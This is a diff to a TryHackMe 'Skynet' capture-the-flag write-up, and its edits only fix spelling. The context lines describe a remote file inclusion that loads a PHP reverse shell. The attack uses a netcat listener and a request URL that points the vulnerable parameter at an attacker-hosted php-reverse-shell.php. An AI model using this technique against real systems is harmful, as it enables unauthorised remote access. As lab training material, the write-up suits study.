Caso-source/caso-source.github.io/TryHackMe/skynet.md

 The vulnerability allows us to drop a reverse php shell on the victim machine after creating a customized query.

-The php rverse shell I used can be found here "/usr/share/webshells/php/php-reverse-shell.php" in kali as well as on pentest monkey's website.
+The php reverse shell I used can be found here "/usr/share/webshells/php/php-reverse-shell.php" in kali as well as on pentest monkey's website.

-Once we have reverse shell ready to go we set up our netcat listener to recieve the incoming connection.
+Once we have reverse shell ready to go we set up our netcat listener to receive the incoming connection.

 Then we throw our query in the browser http://<victim ip>/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://<attcker ip>:8000/php-reverse-shell.php